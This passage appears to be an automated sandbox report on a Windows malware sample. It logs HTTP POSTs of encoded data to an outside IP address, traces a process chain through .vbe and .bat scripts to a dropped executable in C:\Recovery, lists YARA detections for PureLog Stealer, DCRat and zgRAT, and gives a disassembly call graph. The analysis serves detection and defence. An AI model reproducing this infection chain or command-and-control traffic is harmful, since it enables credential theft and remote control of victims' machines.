                                                                                                  Jan 1, 2025 02:28:56.802120924 CET2504OUTData Raw: 56 5b 5b 50 5f 5b 5e 53 5f 5a 5a 53 57 5e 56 5e 5f 5f 5d 46 51 53 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[[P_[^S_ZZSW^V^__]FQSW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C<!T/'#4X8>6X<7>](!#+<$84[%'"."^%#[.
                                                                                                  Jan 1, 2025 02:28:57.177263975 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:57.184277058 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:57 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  142192.168.2.450149185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:57.314255953 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:58.028799057 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:29:00.741898060 CET2504OUTData Raw: 56 5e 5e 54 5a 5d 5b 53 5f 5a 5a 53 57 5f 56 5e 5f 54 5d 41 51 50 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^TZ][S_ZZSW_V^_T]AQPWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<25T$\20<[8>)?1*+6"=47'#2Q.]-"^%#[.>
                                                                                                  Jan 1, 2025 02:29:00.973979950 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:57 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:20:26:52
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\voed9G7p5s.exe"
                                                                                                  Imagebase:0xe00000
                                                                                                  File size:2'342'562 bytes
                                                                                                  MD5 hash:0E22E05075402FD6FC2F0A833D49C288
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:20:26:53
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe"
                                                                                                  Imagebase:0xf60000
                                                                                                  File size:147'456 bytes
                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:20:27:01
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "
                                                                                                  Imagebase:0x240000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:20:27:01
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:20:27:01
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\savesSession/ComponentBrokermonitor.exe"
                                                                                                  Imagebase:0x980000
                                                                                                  File size:2'751'488 bytes
                                                                                                  MD5 hash:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 55%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat"
                                                                                                  Imagebase:0x7ff73f030000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:chcp 65001
                                                                                                  Imagebase:0x7ff6890d0000
                                                                                                  File size:14'848 bytes
                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                  Imagebase:0x7ff67d250000
                                                                                                  File size:108'032 bytes
                                                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:20:27:09
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Recovery\RuntimeBroker.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Recovery\RuntimeBroker.exe"
                                                                                                  Imagebase:0x880000
                                                                                                  File size:2'751'488 bytes
                                                                                                  MD5 hash:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 55%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:10%
                                                                                                    Total number of Nodes:1523
                                                                                                    Total number of Limit Nodes:43
                                                                                                    execution_graph 23359 e1b7e0 23360 e1b7ea __EH_prolog 23359->23360 23525 e01316 23360->23525 23363 e1b82a 23366 e1b841 23363->23366 23368 e1b838 23363->23368 23369 e1b89b 23363->23369 23364 e1bf0f 23604 e1d69e 23364->23604 23377 e1b83c 23368->23377 23380 e1b878 23368->23380 23372 e1b92e GetDlgItemTextW 23369->23372 23376 e1b8b1 23369->23376 23370 e1bf38 23373 e1bf41 SendDlgItemMessageW 23370->23373 23374 e1bf52 GetDlgItem SendMessageW 23370->23374 23371 e1bf2a SendMessageW 23371->23370 23375 e1b96b 23372->23375 23372->23380 23373->23374 23622 e1a64d GetCurrentDirectoryW 23374->23622 23382 e1b980 GetDlgItem 23375->23382 23383 e1b974 23375->23383 23384 e0e617 53 API calls 23376->23384 23377->23366 23378 e0e617 53 API calls 23377->23378 23385 e1b85b 23378->23385 23380->23366 23381 e1b95f KiUserCallbackDispatcher 23380->23381 23381->23366 23387 e1b994 SendMessageW SendMessageW 23382->23387 23388 e1b9b7 SetFocus 23382->23388 23383->23380 23395 e1be55 23383->23395 23389 e1b8ce SetDlgItemTextW 23384->23389 23644 e0124f SHGetMalloc 23385->23644 23386 e1bf82 GetDlgItem 23391 e1bfa5 SetWindowTextW 23386->23391 23392 e1bf9f 23386->23392 23387->23388 23393 e1b9c7 23388->23393 23405 e1b9e0 23388->23405 23394 e1b8d9 23389->23394 23623 e1abab GetClassNameW 23391->23623 23392->23391 23397 e0e617 53 API calls 23393->23397 23394->23366 23401 e1b8e6 GetMessageW 23394->23401 23399 e0e617 53 API calls 23395->23399 23398 e1b9d1 23397->23398 23645 e1d4d4 23398->23645 23406 e1be65 SetDlgItemTextW 23399->23406 23401->23366 23402 e1b8fd IsDialogMessageW 23401->23402 23402->23394 23408 e1b90c TranslateMessage DispatchMessageW 23402->23408 23404 e1c1fc SetDlgItemTextW 23404->23366 23411 e0e617 53 API calls 23405->23411 23409 e1be79 23406->23409 23408->23394 23414 e0e617 53 API calls 23409->23414 23413 e1ba17 23411->23413 23412 e1bff0 23417 e1c020 23412->23417 23421 e0e617 53 API calls 23412->23421 23418 e04092 _swprintf 51 API calls 23413->23418 23446 e1be9c _wcslen 23414->23446 23415 e1c73f 97 API calls 23415->23412 23426 e1c73f 97 API calls 23417->23426 23480 e1c0d8 23417->23480 23422 e1ba29 23418->23422 23419 e1b9d9 23535 e0a0b1 23419->23535 23425 e1c003 SetDlgItemTextW 23421->23425 23427 e1d4d4 16 API calls 23422->23427 23423 e1ba68 GetLastError 23424 e1ba73 23423->23424 23541 e1ac04 SetCurrentDirectoryW 23424->23541 23432 e0e617 53 API calls 23425->23432 23434 e1c03b 23426->23434 23427->23419 23428 e1c18b 23429 e1c194 EnableWindow 23428->23429 23430 e1c19d 23428->23430 23429->23430 23435 e1c1ba 23430->23435 23663 e012d3 GetDlgItem EnableWindow 23430->23663 23431 e1beed 23438 e0e617 53 API calls 23431->23438 23436 e1c017 SetDlgItemTextW 23432->23436 23444 e1c04d 23434->23444 23470 e1c072 23434->23470 23441 e1c1e1 23435->23441 23455 e1c1d9 SendMessageW 23435->23455 23436->23417 23437 e1ba87 23442 e1ba9e 23437->23442 23443 e1ba90 GetLastError 23437->23443 23438->23366 23439 e1c0cb 23447 e1c73f 97 API calls 23439->23447 23441->23366 23457 e0e617 53 API calls 23441->23457 23448 e1bb11 23442->23448 23451 e1bb20 23442->23451 23456 e1baae GetTickCount 23442->23456 23443->23442 23661 e19ed5 32 API calls 23444->23661 23445 e1c1b0 23664 e012d3 GetDlgItem EnableWindow 23445->23664 23446->23431 23450 e0e617 53 API calls 23446->23450 23447->23480 23448->23451 23452 e1bd56 23448->23452 23459 e1bed0 23450->23459 23460 e1bcfb 23451->23460 23461 e1bcf1 23451->23461 23462 e1bb39 GetModuleFileNameW 23451->23462 23560 e012f1 GetDlgItem ShowWindow 23452->23560 23453 e1c066 23453->23470 23455->23441 23542 e04092 23456->23542 23458 e1b862 23457->23458 23458->23366 23458->23404 23466 e04092 _swprintf 51 API calls 23459->23466 23469 e0e617 53 API calls 23460->23469 23461->23380 23461->23460 23655 e0f28c 82 API calls 23462->23655 23463 e1c169 23662 e19ed5 32 API calls 23463->23662 23466->23431 23476 e1bd05 23469->23476 23470->23439 23477 e1c73f 97 API calls 23470->23477 23471 e1bd66 23561 e012f1 GetDlgItem ShowWindow 23471->23561 23472 e1bac7 23545 e0966e 23472->23545 23473 e0e617 53 API calls 23473->23480 23474 e1bb5f 23481 e04092 _swprintf 51 API calls 23474->23481 23475 e1c188 23475->23428 23482 e04092 _swprintf 51 API calls 23476->23482 23483 e1c0a0 23477->23483 23479 e1bd70 23562 e0e617 23479->23562 23480->23428 23480->23463 23480->23473 23486 e1bb81 CreateFileMappingW 23481->23486 23487 e1bd23 23482->23487 23483->23439 23488 e1c0a9 DialogBoxParamW 23483->23488 23491 e1bbe3 GetCommandLineW 23486->23491 23519 e1bc60 __InternalCxxFrameHandler 23486->23519 23499 e0e617 53 API calls 23487->23499 23488->23380 23488->23439 23490 e1baed 23493 e1baff 23490->23493 23494 e1baf4 GetLastError 23490->23494 23495 e1bbf4 23491->23495 23553 e0959a 23493->23553 23494->23493 23656 e1b425 SHGetMalloc 23495->23656 23496 e1bd8c SetDlgItemTextW GetDlgItem 23500 e1bdc1 23496->23500 23501 e1bda9 GetWindowLongW SetWindowLongW 23496->23501 23503 e1bd3d 23499->23503 23567 e1c73f 23500->23567 23501->23500 23502 e1bc10 23657 e1b425 SHGetMalloc 23502->23657 23507 e1bc1c 23658 e1b425 SHGetMalloc 23507->23658 23508 e1c73f 97 API calls 23510 e1bddd 23508->23510 23592 e1da52 23510->23592 23511 e1bc28 23659 e0f3fa 82 API calls 2 library calls 23511->23659 23512 e1bccb 23512->23461 23518 e1bce1 UnmapViewOfFile CloseHandle 23512->23518 23516 e1bc3f MapViewOfFile 23516->23519 23517 e1c73f 97 API calls 23523 e1be03 23517->23523 23518->23461 23519->23512 23520 e1bcb7 Sleep 23519->23520 23520->23512 23520->23519 23521 e1be2c 23660 e012d3 GetDlgItem EnableWindow 23521->23660 23523->23521 23524 e1c73f 97 API calls 23523->23524 23524->23521 23526 e01378 23525->23526 23527 e0131f 23525->23527 23666 e0e2c1 GetWindowLongW SetWindowLongW 23526->23666 23529 e01385 23527->23529 23665 e0e2e8 62 API calls 2 library calls 23527->23665 23529->23363 23529->23364 23529->23366 23531 e01341 23531->23529 23532 e01354 GetDlgItem 23531->23532 23532->23529 23533 e01364 23532->23533 23533->23529 23534 e0136a SetWindowTextW 23533->23534 23534->23529 23536 e0a0bb 23535->23536 23537 e0a175 23536->23537 23538 e0a14c 23536->23538 23667 e0a2b2 23536->23667 23537->23423 23537->23424 23538->23537 23539 e0a2b2 8 API calls 23538->23539 23539->23537 23541->23437 23705 e04065 23542->23705 23546 e09678 23545->23546 23547 e096d5 CreateFileW 23546->23547 23548 e096c9 23546->23548 23547->23548 23549 e0971f 23548->23549 23550 e0bb03 GetCurrentDirectoryW 23548->23550 23549->23490 23551 e09704 23550->23551 23551->23549 23552 e09708 CreateFileW 23551->23552 23552->23549 23554 e095be 23553->23554 23559 e095cf 23553->23559 23555 e095d1 23554->23555 23556 e095ca 23554->23556 23554->23559 23797 e09620 23555->23797 23792 e0974e 23556->23792 23559->23448 23560->23471 23561->23479 23563 e0e627 23562->23563 23812 e0e648 23563->23812 23566 e012f1 GetDlgItem ShowWindow 23566->23496 23568 e1c749 __EH_prolog 23567->23568 23569 e1bdcf 23568->23569 23835 e1b314 23568->23835 23569->23508 23572 e1b314 ExpandEnvironmentStringsW 23578 e1c780 _wcslen _wcsrchr 23572->23578 23573 e1ca67 SetWindowTextW 23573->23578 23578->23569 23578->23572 23578->23573 23579 e1c855 SetFileAttributesW 23578->23579 23584 e1cc31 GetDlgItem SetWindowTextW SendMessageW 23578->23584 23587 e1cc71 SendMessageW 23578->23587 23839 e11fbb CompareStringW 23578->23839 23840 e1a64d GetCurrentDirectoryW 23578->23840 23842 e0a5d1 6 API calls 23578->23842 23843 e0a55a FindClose 23578->23843 23844 e1b48e 76 API calls 2 library calls 23578->23844 23845 e23e3e 23578->23845 23580 e1c90f GetFileAttributesW 23579->23580 23591 e1c86f __cftof _wcslen 23579->23591 23580->23578 23583 e1c921 DeleteFileW 23580->23583 23583->23578 23585 e1c932 23583->23585 23584->23578 23586 e04092 _swprintf 51 API calls 23585->23586 23588 e1c952 GetFileAttributesW 23586->23588 23587->23578 23588->23585 23589 e1c967 MoveFileW 23588->23589 23589->23578 23590 e1c97f MoveFileExW 23589->23590 23590->23578 23591->23578 23591->23580 23841 e0b991 51 API calls 3 library calls 23591->23841 23593 e1da5c __EH_prolog 23592->23593 23869 e10659 23593->23869 23595 e1da8d 23873 e05b3d 23595->23873 23597 e1daab 23877 e07b0d 23597->23877 23601 e1dafe 23893 e07b9e 23601->23893 23603 e1bdee 23603->23517 23605 e1d6a8 23604->23605 24414 e1a5c6 23605->24414 23608 e1d6b5 GetWindow 23609 e1d6d5 23608->23609 23610 e1bf15 23608->23610 23609->23610 23611 e1d6e2 GetClassNameW 23609->23611 23613 e1d706 GetWindowLongW 23609->23613 23614 e1d76a GetWindow 23609->23614 23610->23370 23610->23371 24419 e11fbb CompareStringW 23611->24419 23613->23614 23615 e1d716 SendMessageW 23613->23615 23614->23609 23614->23610 23615->23614 23616 e1d72c GetObjectW 23615->23616 24420 e1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23616->24420 23618 e1d743 24421 e1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23618->24421 24422 e1a80c 8 API calls 23618->24422 23621 e1d754 SendMessageW DeleteObject 23621->23614 23622->23386 23624 e1abcc 23623->23624 23629 e1abf1 23623->23629 24425 e11fbb CompareStringW 23624->24425 23626 e1abf6 SHAutoComplete 23627 e1abff 23626->23627 23631 e1b093 23627->23631 23628 e1abdf 23628->23629 23630 e1abe3 FindWindowExW 23628->23630 23629->23626 23629->23627 23630->23629 23632 e1b09d __EH_prolog 23631->23632 23633 e013dc 84 API calls 23632->23633 23634 e1b0bf 23633->23634 24426 e01fdc 23634->24426 23637 e1b0d9 23639 e01692 86 API calls 23637->23639 23638 e1b0eb 23640 e019af 128 API calls 23638->23640 23641 e1b0e4 23639->23641 23643 e1b10d __InternalCxxFrameHandler ___std_exception_copy 23640->23643 23641->23412 23641->23415 23642 e01692 86 API calls 23642->23641 23643->23642 23644->23458 24434 e1b568 PeekMessageW 23645->24434 23648 e1d502 23654 e1d50d ShowWindow SendMessageW SendMessageW 23648->23654 23649 e1d536 SendMessageW SendMessageW 23650 e1d591 SendMessageW SendMessageW SendMessageW 23649->23650 23651 e1d572 23649->23651 23652 e1d5c4 SendMessageW 23650->23652 23653 e1d5e7 SendMessageW 23650->23653 23651->23650 23652->23653 23653->23419 23654->23649 23655->23474 23656->23502 23657->23507 23658->23511 23659->23516 23660->23383 23661->23453 23662->23475 23663->23445 23664->23435 23665->23531 23666->23529 23668 e0a2bf 23667->23668 23669 e0a2e3 23668->23669 23670 e0a2d6 CreateDirectoryW 23668->23670 23688 e0a231 23669->23688 23670->23669 23672 e0a316 23670->23672 23675 e0a325 23672->23675 23680 e0a4ed 23672->23680 23674 e0a329 GetLastError 23674->23675 23675->23536 23678 e0a2ff 23678->23674 23679 e0a303 CreateDirectoryW 23678->23679 23679->23672 23679->23674 23695 e1ec50 23680->23695 23683 e0a510 23685 e0bb03 GetCurrentDirectoryW 23683->23685 23684 e0a53d 23684->23675 23686 e0a524 23685->23686 23686->23684 23687 e0a528 SetFileAttributesW 23686->23687 23687->23684 23697 e0a243 23688->23697 23691 e0bb03 23692 e0bb10 _wcslen 23691->23692 23693 e0bbb8 GetCurrentDirectoryW 23692->23693 23694 e0bb39 _wcslen 23692->23694 23693->23694 23694->23678 23696 e0a4fa SetFileAttributesW 23695->23696 23696->23683 23696->23684 23698 e1ec50 23697->23698 23699 e0a250 GetFileAttributesW 23698->23699 23700 e0a261 23699->23700 23701 e0a23a 23699->23701 23702 e0bb03 GetCurrentDirectoryW 23700->23702 23701->23674 23701->23691 23703 e0a275 23702->23703 23703->23701 23704 e0a279 GetFileAttributesW 23703->23704 23704->23701 23706 e0407c __vsnwprintf_l 23705->23706 23709 e25fd4 23706->23709 23712 e24097 23709->23712 23713 e240d7 23712->23713 23714 e240bf 23712->23714 23713->23714 23716 e240df 23713->23716 23736 e291a8 20 API calls __dosmaperr 23714->23736 23738 e24636 23716->23738 23718 e240c4 23737 e29087 26 API calls _abort 23718->23737 23723 e24167 23747 e249e6 51 API calls 3 library calls 23723->23747 23724 e04086 23724->23472 23727 e24172 23748 e246b9 20 API calls _free 23727->23748 23728 e240cf 23729 e1fbbc 23728->23729 23730 e1fbc5 IsProcessorFeaturePresent 23729->23730 23731 e1fbc4 23729->23731 23733 e1fc07 23730->23733 23731->23724 23749 e1fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23733->23749 23735 e1fcea 23735->23724 23736->23718 23737->23728 23739 e24653 23738->23739 23740 e240ef 23738->23740 23739->23740 23750 e297e5 GetLastError 23739->23750 23746 e24601 20 API calls 2 library calls 23740->23746 23742 e24674 23770 e2993a 38 API calls __fassign 23742->23770 23744 e2468d 23771 e29967 38 API calls __fassign 23744->23771 23746->23723 23747->23727 23748->23728 23749->23735 23751 e29801 23750->23751 23752 e297fb 23750->23752 23756 e29850 SetLastError 23751->23756 23773 e2b136 23751->23773 23772 e2ae5b 11 API calls 2 library calls 23752->23772 23756->23742 23757 e2981b 23780 e28dcc 23757->23780 23760 e29830 23760->23757 23762 e29837 23760->23762 23761 e29821 23764 e2985c SetLastError 23761->23764 23787 e29649 20 API calls __dosmaperr 23762->23787 23788 e28d24 38 API calls _abort 23764->23788 23765 e29842 23767 e28dcc _free 20 API calls 23765->23767 23769 e29849 23767->23769 23769->23756 23769->23764 23770->23744 23771->23740 23772->23751 23774 e2b143 __dosmaperr 23773->23774 23775 e2b183 23774->23775 23776 e2b16e RtlAllocateHeap 23774->23776 23789 e27a5e 7 API calls 2 library calls 23774->23789 23790 e291a8 20 API calls __dosmaperr 23775->23790 23776->23774 23778 e29813 23776->23778 23778->23757 23786 e2aeb1 11 API calls 2 library calls 23778->23786 23781 e28dd7 RtlFreeHeap 23780->23781 23782 e28e00 _free 23780->23782 23781->23782 23783 e28dec 23781->23783 23782->23761 23791 e291a8 20 API calls __dosmaperr 23783->23791 23785 e28df2 GetLastError 23785->23782 23786->23760 23787->23765 23789->23774 23790->23778 23791->23785 23793 e09781 23792->23793 23794 e09757 23792->23794 23793->23559 23794->23793 23803 e0a1e0 23794->23803 23798 e0962c 23797->23798 23799 e0964a 23797->23799 23798->23799 23801 e09638 CloseHandle 23798->23801 23800 e09669 23799->23800 23811 e06bd5 76 API calls 23799->23811 23800->23559 23801->23799 23804 e1ec50 23803->23804 23805 e0a1ed DeleteFileW 23804->23805 23806 e0a200 23805->23806 23807 e0977f 23805->23807 23808 e0bb03 GetCurrentDirectoryW 23806->23808 23807->23559 23809 e0a214 23808->23809 23809->23807 23810 e0a218 DeleteFileW 23809->23810 23810->23807 23811->23800 23818 e0d9b0 23812->23818 23815 e0e645 SetDlgItemTextW 23815->23566 23816 e0e66b LoadStringW 23816->23815 23817 e0e682 LoadStringW 23816->23817 23817->23815 23823 e0d8ec 23818->23823 23820 e0d9cd 23821 e0d9e2 23820->23821 23831 e0d9f0 26 API calls 23820->23831 23821->23815 23821->23816 23824 e0d904 23823->23824 23830 e0d984 _strncpy 23823->23830 23827 e0d928 23824->23827 23832 e11da7 WideCharToMultiByte 23824->23832 23826 e0d959 23834 e26159 26 API calls 3 library calls 23826->23834 23827->23826 23833 e0e5b1 50 API calls __vsnprintf 23827->23833 23830->23820 23831->23821 23832->23827 23833->23826 23834->23830 23836 e1b31e 23835->23836 23837 e1b3f0 ExpandEnvironmentStringsW 23836->23837 23838 e1b40d 23836->23838 23837->23838 23838->23578 23839->23578 23840->23578 23841->23591 23842->23578 23843->23578 23844->23578 23846 e28e54 23845->23846 23847 e28e61 23846->23847 23848 e28e6c 23846->23848 23858 e28e06 23847->23858 23850 e28e74 23848->23850 23856 e28e7d __dosmaperr 23848->23856 23853 e28dcc _free 20 API calls 23850->23853 23851 e28e82 23865 e291a8 20 API calls __dosmaperr 23851->23865 23852 e28ea7 RtlReAllocateHeap 23855 e28e69 23852->23855 23852->23856 23853->23855 23855->23578 23856->23851 23856->23852 23866 e27a5e 7 API calls 2 library calls 23856->23866 23859 e28e44 23858->23859 23863 e28e14 __dosmaperr 23858->23863 23868 e291a8 20 API calls __dosmaperr 23859->23868 23861 e28e2f RtlAllocateHeap 23862 e28e42 23861->23862 23861->23863 23862->23855 23863->23859 23863->23861 23867 e27a5e 7 API calls 2 library calls 23863->23867 23865->23855 23866->23856 23867->23863 23868->23862 23870 e10666 _wcslen 23869->23870 23897 e017e9 23870->23897 23872 e1067e 23872->23595 23874 e10659 _wcslen 23873->23874 23875 e017e9 78 API calls 23874->23875 23876 e1067e 23875->23876 23876->23597 23878 e07b17 __EH_prolog 23877->23878 23914 e0ce40 23878->23914 23880 e07b32 23920 e1eb38 23880->23920 23882 e07b5c 23929 e14a76 23882->23929 23885 e07c7d 23886 